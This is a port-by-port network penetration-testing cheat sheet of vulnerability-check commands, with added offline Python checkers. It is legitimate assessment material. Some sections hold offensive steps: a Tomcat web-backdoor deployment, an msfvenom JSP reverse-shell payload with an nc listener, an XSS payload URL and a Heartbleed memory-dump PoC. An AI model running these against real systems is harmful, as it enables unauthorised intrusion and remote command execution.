Penetration Testing - Network
Manual Vulnerability Assessment
TCP/21: FTP
Anonymous FTP Enabled
anonymous
guest
TCP/22: SSH
nmap -p 22 --script ssh2-enum-algos <ip_address>
SSH Weak Algorithms Supported
SSH Server CBC Mode Ciphers Enabled
ssh -oCiphers=<ciphers> <ip_address>
SSH Weak MAC Algorithms Enabled
ssh -oMACs=<algorithm> <ip_address>
SSH Protocol v1 Supported
ssh -1 <ip_address> -v
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com
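The three SSH findings above (weak ciphers, CBC mode, weak MACs) and the hardened Ciphers/MACs lines can be checked together offline. The script below is an added example, not part of the original page or of any tool it names: it parses ssh2-enum-algos style output (SAMPLE_NMAP is constructed to match that layout), applies weakness rules written by the editor (CBC, RC4/arcfour, 64-bit block ciphers, MD5/SHA-1/96-bit MACs, and, going beyond the page, SHA-1 or 1024-bit DH key exchange), and runs the same rules over sshd_config lines so the hardened configuration above can be confirmed clean.

```python
"""Flag weak SSH algorithms in ssh2-enum-algos output or an sshd_config.

Added example, not part of the original page. SAMPLE_NMAP is constructed to
match the layout of `nmap -p 22 --script ssh2-enum-algos`; HARDENED_CONFIG
holds the Ciphers/MACs lines given on the page.
"""
import re

# Substrings that mark an algorithm as weak, keyed by the reason reported.
# The first matching reason wins (so 3des-cbc is reported as CBC mode).
WEAK_RULES = {
    "kex": {"1024-bit DH group": ("group1-",), "SHA-1 key exchange": ("sha1",)},
    "cipher": {
        "CBC mode cipher": ("-cbc",),
        "RC4/arcfour stream cipher": ("arcfour", "rc4"),
        "64-bit block cipher": ("3des", "blowfish", "cast128"),
    },
    "mac": {
        "MD5-based MAC": ("md5",),
        "SHA-1-based MAC": ("sha1",),
        "truncated 96-bit tag": ("-96",),
    },
}

def classify(kind, name):
    """Return why an algorithm is weak, or None if it is acceptable."""
    lname = name.lower()
    for reason, needles in WEAK_RULES[kind].items():
        if any(needle in lname for needle in needles):
            return reason
    return None

def weak_algorithms(kex, ciphers, macs):
    """Map every weak algorithm name to its reason; {} means nothing to report."""
    findings = {}
    for kind, names in (("kex", kex), ("cipher", ciphers), ("mac", macs)):
        for name in names:
            reason = classify(kind, name)
            if reason:
                findings[name] = reason
    return findings

def parse_nmap_enum_algos(text):
    """Pull the kex, cipher and MAC lists out of ssh2-enum-algos output.

    The script prints "<section>_algorithms: (N)" headers, each followed by
    one indented algorithm per line; only that layout is relied on.
    """
    wanted = {"kex_algorithms": [], "encryption_algorithms": [], "mac_algorithms": []}
    current = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("|_ ").strip()
        header = re.match(r"(\w+_algorithms):", line)
        if header:
            current = header.group(1) if header.group(1) in wanted else None
        elif current and line:
            wanted[current].append(line)
    return wanted["kex_algorithms"], wanted["encryption_algorithms"], wanted["mac_algorithms"]

def audit_sshd_config(text):
    """Check the KexAlgorithms, Ciphers and MACs lines of an sshd_config."""
    lists = {"kexalgorithms": [], "ciphers": [], "macs": []}
    for raw in text.splitlines():
        line = raw.strip()
        parts = line.split(None, 1)
        if line.startswith("#") or len(parts) != 2 or parts[0].lower() not in lists:
            continue
        lists[parts[0].lower()].extend(v.strip() for v in parts[1].split(","))
    return weak_algorithms(lists["kexalgorithms"], lists["ciphers"], lists["macs"])

# Constructed sample: a host that still advertises legacy algorithms.
SAMPLE_NMAP = """\
| ssh2-enum-algos:
|   kex_algorithms: (3)
|       curve25519-sha256
|       diffie-hellman-group14-sha1
|       diffie-hellman-group1-sha1
|   server_host_key_algorithms: (1)
|       ssh-ed25519
|   encryption_algorithms: (4)
|       aes256-ctr
|       aes128-cbc
|       3des-cbc
|       arcfour
|   mac_algorithms: (3)
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1
|_      hmac-md5-96
"""

HARDENED_CONFIG = """\
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com
"""

if __name__ == "__main__":
    for name, reason in weak_algorithms(*parse_nmap_enum_algos(SAMPLE_NMAP)).items():
        print("%-30s %s" % (name, reason))
    print("hardened config findings:", audit_sshd_config(HARDENED_CONFIG))
```

Run it with the real nmap output on stdin or pasted into SAMPLE_NMAP; an empty dictionary from audit_sshd_config is the expected result for the hardened configuration above, and each name the scan check returns maps directly to one of the finding titles.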
TCP/23: Telnet
Unencrypted Telnet Server
telnet <ip_address> 23
TCP/25: SMTP
SMTP Service Cleartext Login Permitted
telnet <ip_address> 25
EHLO <ip_address>
AUTH LOGIN
nc <ip_address> 25
EXPN root
VRFY root
TCP/53: DNS
DNS Server Cache Snooping Remote Information Disclosure
nmap -sU -p 53 --script dns-cache-snoop <ip_address>
nslookup example.com <ip_address>
DNS Server Recursive Query Cache Poisoning Weakness
nmap -Pn -sU -p 53 --script=dns-recursion <ip_address>
DNS Server Spoofed Request Amplification DDoS
msf > use auxiliary/scanner/dns/dns_amp
dig . NS @<ip_address>
DNS Server Zone Transfer Information Disclosure (AXFR)
dig axfr @<ip_address> <domain.name>
MS11-058: Vulnerabilities in DNS Server Could Allow Remote Code Execution (2562485) (uncredentialed check)
MS12-017: Vulnerability in DNS Server Could Allow Denial of Service (2647170) (uncredentialed check)
dig @<ip_address> version.bind txt chaos
TCP/79: Finger
Finger 0@host Information Disclosure
msf > use auxiliary/scanner/finger/finger_users
TCP/80: HTTP
HTTP TRACE / TRACK Methods Allowed
curl -v -X TRACE <ip_address>:<port>
MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)
Vulnerable response: HTTP/1.1 416 Requested Range Not Satisfiable
curl -v <ip_address>:<port>/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
Apache Server ETag Header Information Disclosure
curl -v -X GET <ip_address>:<port>
Please refer to https://www.axcelsec.com/2017/12/web-server-hardening-apache.html for more information.
TCP/110: POP3
POP3 Cleartext Logins Permitted
telnet <ip_address> 110
USER testuser
PASS 123456
TCP/389: Lightweight Directory Access Protocol (LDAP)
LDAP NULL BASE Search Access
ldapsearch -h <ip_address> -x -s base
TCP/443: HTTPS
sslscan <ip_address>
SSL Version 2 and 3 Protocol Detection
openssl s_client -connect <ip_address>:<port> -ssl3
SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
# <ip_address>:<port> is a placeholder as elsewhere on this page. The -ssl3 option needs an openssl build with SSLv3 compiled in; "unknown option -ssl3" means the client cannot test, not that the server is safe.
target="<ip_address>:<port>"
if ! echo | timeout 3 openssl s_client -connect "$target" >/dev/null 2>&1; then
  echo "UNKNOWN: $target timeout or connection error"
elif echo | openssl s_client -connect "$target" -ssl3 2>&1 | grep -q "sslv3 alert handshake failure\|SSL3_GET_RECORD:wrong version number"; then
  echo "OK: $target not vulnerable"
else
  echo "FAIL: $target vulnerable; sslv3 connection accepted"
fi
Heartbleed
python heartbleed-poc.py -n100 -f dump.bin <ip_address>
msf > use auxiliary/scanner/ssl/openssl_heartbleed
SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
openssl s_client -connect <ip_address>:<port_no> -cipher 'EXP'
SSL Certificate Chain Contains RSA Keys Less Than 2048 bits
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -text -noout | grep "Public-Key"
SSL Certificate Signed Using Weak Hashing Algorithm
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -text -noout | grep "Signature Algorithm"
SSL Certificate Expiry
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -noout -dates
SSL Certificate with Wrong Hostname
nmblookup -A 10.171.72.5 | grep '<00' | grep -v GROUP | awk '{print $1}'
SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
openssl s_client -connect <ip_address>:<port> | grep "Renegotiation"
Vulnerable: Secure Renegotiation IS NOT supported
SSL 64-bit Block Size Cipher Suites Supported (SWEET32)
openssl s_client -connect <ip_address>:<port> -cipher DES-CBC3-SHA
SSL RC4 Cipher Suites Supported (Bar Mitzvah)
openssl s_client -connect <ip_address>:<port> -cipher RC4-MD5
openssl s_client -connect <ip_address>:<port> -cipher RC4-SHA
ESXi Multiple Vulnerabilities
nmap --script vmware-version -p443 <ip_address>
https://<ip_address>/sdk/vim.wsdl
POST https://<ip_address>/sdk
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
Microsoft Exchange Server Unsupported Version Detection (Uncredentialed)
view-source:https://<ip_address>/owa
Microsoft Exchange Client Access Server Information Disclosure
openssl s_client -host <ip_address> -port 443
GET /autodiscover/autodiscover.xml HTTP/1.0
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
The WWW-Authenticate: Basic realm response header discloses the server's internal IP address.
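The same check can be run offline over a captured response. The following Python function is an added example (not from the original page): it parses the response headers and reports every header value that contains a private IPv4 address, so an internal address in the Basic realm is caught without eyeballing the output. Both responses it uses are constructed.

```python
"""Detect a private IPv4 address leaking through HTTP response headers.

Added example, not part of the original page. LEAKING_RESPONSE is
constructed to resemble the Autodiscover reply the page describes: an IIS
401 whose WWW-Authenticate Basic realm names an internal address.
"""
import ipaddress
import re

# Dotted-quad candidates; the look-arounds stop "1.2.3.4.5" style over-matches.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

def parse_response_headers(raw):
    """Split a raw HTTP response into its status line and {name: [values]}."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def leaked_private_addresses(raw):
    """Return [(header, address)] for each non-routable IPv4 found in a header value."""
    _, headers = parse_response_headers(raw)
    leaks = []
    for name, values in headers.items():
        for value in values:
            for candidate in IPV4_RE.findall(value):
                try:
                    addr = ipaddress.ip_address(candidate)
                except ValueError:  # e.g. an octet above 255
                    continue
                # is_private covers RFC 1918 space and also loopback, link-local
                # and the RFC 5737 documentation ranges; any of them is a leak.
                if addr.is_private:
                    leaks.append((name, candidate))
    return leaks

# Constructed sample of the leaking reply.
LEAKING_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/8.5\r\n"
    "WWW-Authenticate: Basic realm=\"192.168.10.25\"\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed sample of a reply whose realm is a hostname instead.
CLEAN_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/8.5\r\n"
    "WWW-Authenticate: Basic realm=\"autodiscover.example.com\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(leaked_private_addresses(LEAKING_RESPONSE))
    print(leaked_private_addresses(CLEAN_RESPONSE))
```

Feed it the raw response captured from the openssl s_client session above; the fix on the server side is a realm that names the external hostname rather than the host's address.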
MS11-061: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege (2546250) (uncredentialed check)
https://<ip_address>/RDWeb/Pages/en-US/login.aspx?ReturnUrl=%22%20onmouseover%3d%22javascript%3aalert(%27Cross-site%20Scripting%27)
TCP/445: SMB
Microsoft Windows SMB NULL Session Authentication
rpcclient -U "" <ip_address>
smbclient -L <ip_address>
Exploitation:
smbclient //<ip_address>/IPC$ -N
SMB Signing Required
SMB Signing Disabled
nmap --script smb-security-mode -p445 <ip_address>
Microsoft Windows SMBv1 Multiple Vulnerabilities
nmap --script smb-protocols <ip_address>
MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
nmap -p445 --script smb-vuln-ms17-010 <ip_address>
Concept
Request: Tree Connect AndX Request, Path: \\<IP_Address>\IPC$
Response: Tree Connect AndX Response
Request: PeekNamedPipe Request, FID: 0x0000
Response: Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES
For more background on SMB security, read the article Server Message Block (SMB) Security.
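The decision behind the Concept above, as an added Python example that is neither the page's code nor the nmap script: it parses the SMB1 header of the Trans response to the PeekNamedPipe request and maps the NT status to a verdict. STATUS_INSUFF_SERVER_RESOURCES is the signature named on the page; treating STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE as the patched case is the editor's addition. The packets are constructed in the script, so nothing is sent on the network.

```python
"""Interpret the SMB1 Trans response that the MS17-010 check keys on.

Added example, not the nmap script or the page's own code. The responses
below are constructed: a 32-byte SMB1 header plus an empty parameter/data
section, as a Transaction reply to PeekNamedPipe on FID 0 would carry.
"""
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25

# NT status codes (MS-ERREF) that the check distinguishes.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched: the vulnerable signature
STATUS_ACCESS_DENIED = 0xC0000022              # returned once MS17-010 is applied
STATUS_INVALID_HANDLE = 0xC0000008             # also seen on patched hosts

def parse_smb1_header(data):
    """Return (command, nt_status, tid, uid, mid) from a raw SMB1 message."""
    if len(data) < 32 or data[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    # Header layout: magic(4) command(1) status(4) flags(1) flags2(2)
    # pid_high(2) signature(8) reserved(2) tid(2) pid_low(2) uid(2) mid(2)
    command, status = struct.unpack_from("<BI", data, 4)
    tid, _pid_low, uid, mid = struct.unpack_from("<HHHH", data, 24)
    return command, status, tid, uid, mid

def classify_peek_response(data):
    """Map the Trans response status to the verdict the check reports."""
    command, status, _tid, _uid, _mid = parse_smb1_header(data)
    if command != SMB_COM_TRANSACTION:
        return "UNEXPECTED: command 0x%02x" % command
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "NOT VULNERABLE"
    return "INCONCLUSIVE: NT status 0x%08x" % status

def build_smb1_reply(command, status, tid=0x0800, uid=0x0800, mid=0x41):
    """Construct a minimal SMB1 reply (header + WordCount 0 + ByteCount 0)."""
    header = SMB1_MAGIC + struct.pack("<BIBHH", command, status, 0x98, 0xC807, 0)
    header += b"\x00" * 8 + b"\x00\x00" + struct.pack("<HHHH", tid, 0xFEFF, uid, mid)
    return header + b"\x00" + b"\x00\x00"

# Constructed samples: the two answers a host gives to the same request.
SAMPLE_VULNERABLE = build_smb1_reply(SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES)
SAMPLE_PATCHED = build_smb1_reply(SMB_COM_TRANSACTION, STATUS_ACCESS_DENIED)

if __name__ == "__main__":
    for label, packet in (("unpatched", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED)):
        print(label, "->", classify_peek_response(packet))
```

The same status field is what Wireshark shows as "Error: STATUS_INSUFF_SERVER_RESOURCES" in the Trans Response, so the parser doubles as a way to confirm a capture by hand.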
TCP/512: Remote Process Execution
Rexecd Service Enabled
nmap <ip_address> --script rexec-brute -p512
TCP/1521: Oracle Database Default Listener
Oracle TNS Listener Remote Poisoning
msf > use auxiliary/scanner/oracle/tnspoison_checker
TCP/2049: Network File System (NFS)
NFS Shares World Readable
nmap -sV --script=nfs-showmount <ip_address>
apt-get install nfs-common
showmount -e <ip_address>
mount -t nfs <ip_address>:/<directory> <local directory> -o nolock
TCP/8080: Apache Tomcat
Tomcat Application Manager Login
Exploitation:
auxiliary/scanner/http/tomcat_mgr_login
\fuzzdb-master\web-backdoors\jsp\laudanum\cmd.war
http://<target IP>:8080/cmd/cmd.jsp?cmd=whoami
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP> LPORT=4444 -f war > shell.war
nc -l -v -p 4444
TCP/3389: Remote Desktop Connection (RDP)
Terminal Services Encryption Level is Medium or Low
nmap -Pn --script rdp-enum-encryption -p3389 <ip_address>
Concept
Request: ClientData
Response: ServerData - ServerSecurityData - encryptionLevel
Encryption Level
1. Low
2. Client Compatible (Default)
3. High
4. FIPS Compliant
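The ServerSecurityData decoding behind the Concept above, as an added Python example (not the page's or nmap's code). It assumes the TS_UD_SC_SEC1 layout from MS-RDPBCGR (a 0x0C02 user-data header, then encryptionMethod and encryptionLevel as 32-bit little-endian fields); the encryptionMethod bit values and the meaning of level 0 are the editor's additions from that specification, and the sample blocks are constructed.

```python
"""Decode the ServerSecurityData block that rdp-enum-encryption reports on.

Added example, not the page's or nmap's code. Layout assumed from
MS-RDPBCGR TS_UD_SC_SEC1: header type (2), length (2), encryptionMethod (4),
encryptionLevel (4), all little-endian. Sample blocks are constructed.
"""
import struct

SC_SECURITY = 0x0C02

# encryptionLevel values. The page lists 1-4; 0 means Standard RDP Security is
# not in effect because an external protocol (TLS / CredSSP) was negotiated.
ENCRYPTION_LEVELS = {
    0: "None",
    1: "Low",
    2: "Client Compatible",
    3: "High",
    4: "FIPS Compliant",
}

# encryptionMethod is a bit mask of the methods the server will accept.
ENCRYPTION_METHODS = {
    0x01: "40-bit RC4",
    0x02: "128-bit RC4",
    0x08: "56-bit RC4",
    0x10: "FIPS 140-1",
}

def parse_server_security_data(data):
    """Return (encryptionMethod, encryptionLevel) from a TS_UD_SC_SEC1 block."""
    header_type, length = struct.unpack_from("<HH", data, 0)
    if header_type != SC_SECURITY:
        raise ValueError("not a ServerSecurityData block (type 0x%04x)" % header_type)
    if length < 12 or len(data) < 12:
        raise ValueError("ServerSecurityData block too short")
    method, level = struct.unpack_from("<II", data, 4)
    return method, level

def assess_encryption(data):
    """Name the level and methods and say whether the finding applies."""
    method, level = parse_server_security_data(data)
    methods = [name for bit, name in ENCRYPTION_METHODS.items() if method & bit]
    return {
        "level": ENCRYPTION_LEVELS.get(level, "Unknown (%d)" % level),
        "methods": methods,
        # "Terminal Services Encryption Level is Medium or Low" covers levels 1 and 2.
        "medium_or_low": level in (1, 2),
    }

def build_server_security_data(method, level):
    """Constructed TS_UD_SC_SEC1 block without the optional server random/certificate."""
    return struct.pack("<HHII", SC_SECURITY, 12, method, level)

SAMPLE_DEFAULT = build_server_security_data(0x01 | 0x02, 2)   # Client Compatible, 40/128-bit
SAMPLE_FIPS = build_server_security_data(0x10, 4)              # FIPS Compliant

if __name__ == "__main__":
    print(assess_encryption(SAMPLE_DEFAULT))
    print(assess_encryption(SAMPLE_FIPS))
```

The block is the one Wireshark labels ServerSecurityData inside the MCS Connect Response; a level of 0 is not a finding by itself, it means the session is protected by TLS or CredSSP rather than by the Standard RDP Security ciphers listed here.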
Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness
perl rdp-sec-check.pl <ip_address>
cpan Encoding::BER
Terminal Services Doesn't Use Network Level Authentication (NLA) Only
rdesktop <ip_address>
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
nmap -p3389 --script rdp-vuln-ms12-020 <ip_address>
MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (uncredentialed check)
git clone https://github.com/anexia-it/winshock-test.git
./winshock_test.sh <ip_address> <port>
Concept
The MS14-066 update added four new cipher suites to Schannel, so the check is whether the target supports these previously unsupported suites:
- DHE-RSA-AES256-GCM-SHA384
- DHE-RSA-AES128-GCM-SHA256
- AES256-GCM-SHA384
- AES128-GCM-SHA256
For more background on RDP security, read the article Remote Desktop Protocol (RDP) Security.
UDP/123: NTP
Network Time Protocol (NTP) Mode 6 Scanner
ntpq -c rv <ip_address>
nmap -sU -p 123 --script ntp-info <ip_address>
A properly restricted server should not answer either query.
Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS
ntpdc -n -c monlist <ip_address>
Returns the list of recent hosts that connected to this NTP server.
UDP/161: SNMP
SNMP Agent Default Community Name (public)
onesixtyone <ip_address> -c /usr/share/doc/onesixtyone/dict.txt
./snmpcheck-1.8.pl -t <ip_address> -c public
UDP/500: ISAKMP
Internet Key Exchange (IKE) Aggressive Mode with Pre-Shared Key
ike-scan <ip_address> --id=test -A
UDP/5353: mDNS
mDNS Detection
dig @<ip_address> -p 5353 -t ptr _services._dns-sd._udp.local
Other Useful Commands
Update nmap and metasploit
apt update; apt install metasploit-framework
apt-get install nmap